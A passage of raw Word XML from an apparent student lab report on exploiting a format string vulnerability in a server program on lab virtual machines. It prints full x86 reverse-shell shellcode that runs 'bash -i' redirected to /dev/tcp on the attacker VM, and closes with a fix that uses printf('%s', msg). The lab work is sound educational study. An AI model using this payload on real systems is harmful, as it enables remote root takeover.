          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2FED86" w14:textId="77777777" w:rsidR="00D4765D" w:rsidRDefault="00D4765D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31D3E1CD" w14:textId="193240ED" w:rsidR="003807EC" w:rsidRPr="003807EC" w:rsidRDefault="003807EC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003807EC">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Observation and Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDD988D" w14:textId="5B825B60" w:rsidR="003807EC" w:rsidRDefault="003807EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>In this task, we perform the reverse shell attack</w:t>
      </w:r>
      <w:r w:rsidR="00A219CD">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> by format string vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>. After we succeed, we should get</w:t>
      </w:r>
      <w:r w:rsidR="00571A2E">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> a root shell of the server VM o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>n the attacker VM. We first run the server program in the server VM, then we setup a listening port on the attacker VM (screenshot 1 and 2). Then we run the python program again, and the program sends a message to the server VM (screenshot3). Then we check the listening port, we already got a root shell of the server VM. Then we run command ifconfig, we see the IP address is 10.0.2.5 which is the server’s IP address; and we also run command id, which shows the shell is a root shell (screenshot4). The program is same as last program,</w:t>
      </w:r>
      <w:r w:rsidR="002265F9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> except the shellcode; we change the shellcode which will run reverse shell command.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002265F9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">The reverse shellcode is following: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC36B03"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reverseShell= ( </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FED4854"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Push '/bin////bash' into stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFCA131"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"\x31\xc0"                  # xorl %eax,%eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C0DD8D"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"\x50"                          # pushl %eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C000A5E"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"\x68""bash"                # pushl "bash"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689A8F11"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pushl "////"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6F64A2"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"\x68""/bin"                # pushl "/bin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28744C15"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"\x89\xe3"                  # movl %esp, %ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10978212"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p>
    <w:p w14:paraId="1F65A81C"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Push '-ccc' into stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EEFD29"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"\x31\xc0"                  # xorl %eax,%eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0072D036"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"\x50"                              # pushl %eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAA5194"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"\x68""-ccc"                # pushl "-ccc"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540869D1"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"\x89\xe0"                  # movl %esp, %eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D04E11"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p>
    <w:p w14:paraId="0F4FC589"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Push command for reverse shell into stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0259C6B4"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"\x31\xd2"              # xorl %edx,%edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4928A821"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"\x52"                  # pushl %edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C6D16F"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"\x68""2&gt;&amp;1"                # pushl "2&gt;&amp;1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615D58D4"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 pushl "    "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55259E1F"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"\x68""0&lt;&amp;1"                # pushl "0&lt;&amp;1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2FF4B0"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 pushl "    "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCACD39"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 pushl "    "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382FA98C" w14:textId="7B75A9FF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17882F49" w14:textId="6C078CC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"\x68""070 " </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8ACBAD" w14:textId="78B092EB"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"\x68""29/7" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB4829E" w14:textId="2951BE95"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"\x68""0.2." </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6103A7E9" w14:textId="40092415"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"\x68""/10." </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644D7E8B"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"\x68""/tcp"                # pushl "/tcp"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFC7FBA"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"\x68""/dev"                # pushl "/dev"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BCC541"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&gt;  "                # pushl " &gt;  "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E841C8"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-i "                # pushl " -i "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D30502D"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"\x68""bash"                # pushl "bash"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3180A2DE"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pushl "////"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF4F44B"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"\x68""/bin"                # pushl "/bin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064CAC54"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"\x89\xe2"              # movl %esp,%edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467BC624"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p>
    <w:p w14:paraId="156D32B1"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Construct the argv[] array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193E5B16"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"\x31\xc9"              # xorl %ecx,%ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083929F8"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"\x51"                  # pushl %ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140BD3CE"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"\x52"                  # pushl %edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C94EF8"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"\x50"                  # pushl %eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E73E5C"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"\x53"                  # pushl %ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17502717"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"\x89\xe1"              # movl %esp,%ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F864C2"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p>
    <w:p w14:paraId="6C3E6AA6"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Set edx to 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318E4C08"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"\x31\xd2"              # xorl %edx,%edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B078DC6"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p>
    <w:p w14:paraId="2BD6A79E"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Invoke the system call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E92533"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"\x31\xc0"              # xorl %eax,%eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F44F655"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"\xb0\x0b"                          # movb $0x0b,%al</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AB0ECA"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"\xcd\x80"                          # int $0x80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04635B84" w14:textId="77777777" w:rsidR="002265F9" w:rsidRPr="003660CA" w:rsidRDefault="002265F9" w:rsidP="002265F9">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).encode('latin-1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AB32AB" w14:textId="77777777" w:rsidR="002265F9" w:rsidRDefault="002265F9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="288A54A2" w14:textId="77777777" w:rsidR="003807EC" w:rsidRDefault="003807EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D892E18" w14:textId="77777777" w:rsidR="00D4765D" w:rsidRDefault="00D4765D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72BA2CAD" w14:textId="18C1B837" w:rsidR="00D4765D" w:rsidRPr="00A2539E" w:rsidRDefault="00D4765D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A2539E">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Task8: Fix the Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEBC96F" w14:textId="64AADD91" w:rsidR="002A598D" w:rsidRDefault="00584926">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002A598D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A02FE30" wp14:editId="2FDE2A3D">
            <wp:extent cx="5939790" cy="604520"/>
            <wp:effectExtent l="0" t="0" r="3810" b="5080"/>
            <wp:docPr id="5" name="Picture 5" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%2011.5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20Shot%202018-10-17%20at%2011.52.0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790" cy="604520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A0E1C2" w14:textId="77777777" w:rsidR="002A598D" w:rsidRDefault="002A598D" w:rsidP="002A598D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot1, we compile the safe version of the server program, no warning anymore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6F20D4" w14:textId="77777777" w:rsidR="002A598D" w:rsidRDefault="002A598D" w:rsidP="002A598D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="014B30FF" w14:textId="6B235690" w:rsidR="002A598D" w:rsidRDefault="00957C14" w:rsidP="002A598D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49DA2067" wp14:editId="51314B52">
            <wp:extent cx="5924550" cy="1299845"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="Picture 21" descr="../../../../Desktop/Screen%20Shot%202018-10-22%20at%201.4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0-22%20at%201.49.26%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4550" cy="1299845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B915331" w14:textId="67EDB537" w:rsidR="002A598D" w:rsidRDefault="00957C14" w:rsidP="002A598D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot2, we try the task3</w:t>
      </w:r>
      <w:r w:rsidR="002A598D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and task6 again. The input messages are printed, </w:t>
      </w:r>
      <w:r w:rsidR="00A00967">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>they are treated as normal string, so</w:t>
      </w:r>
      <w:r w:rsidR="002A598D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> they c</w:t>
      </w:r>
      <w:r w:rsidR="001E71C8">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>annot cause any problem</w:t>
      </w:r>
      <w:r w:rsidR="002A598D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>. So our attack fails with the safe version of the server program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D68E570" w14:textId="2111D407" w:rsidR="002A598D" w:rsidRDefault="002A598D" w:rsidP="002A598D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E779143" w14:textId="55E808A7" w:rsidR="002A598D" w:rsidRDefault="002A598D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C0CAF86" w14:textId="1DB68F02" w:rsidR="002A598D" w:rsidRPr="002A598D" w:rsidRDefault="002A598D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A598D">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Observation and Explantion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B50E081" w14:textId="0A26F7F3" w:rsidR="00D4765D" w:rsidRDefault="00584926" w:rsidP="002A598D">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">The warning is about </w:t>
      </w:r>
      <w:r w:rsidR="003E4798">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">that the compiler </w:t>
      </w:r>
      <w:r w:rsidR="00E31857">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>detects</w:t>
      </w:r>
      <w:r w:rsidR="003E4798">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> potential format string vulnerability, so it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E31857">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>notifies</w:t>
      </w:r>
      <w:r w:rsidR="003E4798">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> the developer that a part of format string may come from untrusted users.</w:t>
      </w:r>
      <w:r w:rsidR="00E31857">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> To fix such problem, we just need to make sure that user input cannot be a part of format string. So for the server program, we make following change</w:t>
      </w:r>
      <w:r w:rsidR="002A598D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (mark by red)</w:t>
      </w:r>
      <w:r w:rsidR="00E31857">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3E4C4D" w14:textId="0A2870EB" w:rsidR="00E31857" w:rsidRPr="00E31857" w:rsidRDefault="00E31857" w:rsidP="00E31857">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E31857">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>void myprintf(char *msg)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D01FCF7" w14:textId="7F4B632B" w:rsidR="00E31857" w:rsidRPr="00E31857" w:rsidRDefault="00E31857" w:rsidP="00E31857">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E31857">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">{   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10526527" w14:textId="77777777" w:rsidR="00E31857" w:rsidRPr="00E31857" w:rsidRDefault="00E31857" w:rsidP="00E31857">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E31857">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    printf("The address of the 'msg' argument: 0x%.8x\n", (unsigned) &amp;msg);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FF3F57" w14:textId="77777777" w:rsidR="00E31857" w:rsidRPr="00E31857" w:rsidRDefault="00E31857" w:rsidP="00E31857">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E31857">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    // This line has a format-string vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322DD2F5" w14:textId="77777777" w:rsidR="00E31857" w:rsidRPr="00E31857" w:rsidRDefault="00E31857" w:rsidP="00E31857">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E31857">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E31857">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>printf("%s", msg);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2302DF7E" w14:textId="77777777" w:rsidR="00E31857" w:rsidRPr="00E31857" w:rsidRDefault="00E31857" w:rsidP="00E31857">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E31857">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    printf("The value of the 'target' variable (after): 0x%.8x\n", target);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC4D97D" w14:textId="40449A1F" w:rsidR="00D4765D" w:rsidRPr="00E31857" w:rsidRDefault="00E31857" w:rsidP="00E31857">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E31857">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D97DB1" w14:textId="62D63762" w:rsidR="00E31857" w:rsidRDefault="00990931" w:rsidP="00E31857">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Because</w:t>
      </w:r>
      <w:r w:rsidR="00C3008B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> the server program just print </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">out </w:t>
      </w:r>
      <w:r w:rsidR="00C3008B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>everything typed by the user; so i</w:t>
      </w:r>
      <w:r w:rsidR="00E31857">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>nstead of using printf(msg), the msg can be a part of format string. We use printf(“%s”, msg)</w:t>
      </w:r>
      <w:r w:rsidR="00C3008B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, which will treat user input as normal string and print </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">out </w:t>
      </w:r>
      <w:r w:rsidR="00C3008B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>them</w:t>
      </w:r>
      <w:r w:rsidR="00E31857">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. So the user input cannot be </w:t>
      </w:r>
      <w:r w:rsidR="00E01CAB">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">a part of format </w:t>
      </w:r>
      <w:r w:rsidR="005F54BB">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>string anymore, and they cannot cause any dangerous things.</w:t>
      </w:r>
      <w:r w:rsidR="00890B6F">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> As screenshot2 shows, we redo </w:t>
      </w:r>
      <w:r w:rsidR="00957C14">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>task3</w:t>
      </w:r>
      <w:r w:rsidR="00890B6F">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, this time we cannot </w:t>
      </w:r>
      <w:r w:rsidR="00957C14">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>crash the server program</w:t>
      </w:r>
      <w:r w:rsidR="00890B6F">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. We also redo task6, </w:t>
      </w:r>
      <w:r w:rsidR="00790AFC">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>the program treat</w:t>
      </w:r>
      <w:r w:rsidR="00957C14">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00790AFC">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> our </w:t>
      </w:r>
      <w:r w:rsidR="00A254A4">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>message string, no extra 0</w:t>
      </w:r>
      <w:r w:rsidR="00BA7FBA">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00A254A4">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> are printed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F57366" w14:textId="630F1D68" w:rsidR="00E31857" w:rsidRDefault="00E31857" w:rsidP="00E31857">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1560F0E5" w14:textId="203FD22F" w:rsidR="00E31857" w:rsidRDefault="00E31857" w:rsidP="00E31857">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63E9D6C5" w14:textId="77777777" w:rsidR="003660CA" w:rsidRDefault="003660CA" w:rsidP="00E31857">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CE12CEB" w14:textId="77777777" w:rsidR="003660CA" w:rsidRDefault="003660CA" w:rsidP="00E31857">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0584F5B0" w14:textId="77777777" w:rsidR="003660CA" w:rsidRDefault="003660CA" w:rsidP="00E31857">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A96B040" w14:textId="77777777" w:rsidR="00E01CAB" w:rsidRDefault="00E01CAB" w:rsidP="00E31857">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58D20AE5" w14:textId="44004DFC" w:rsidR="003660CA" w:rsidRPr="004C0463" w:rsidRDefault="003660CA" w:rsidP="00E31857">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C0463">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
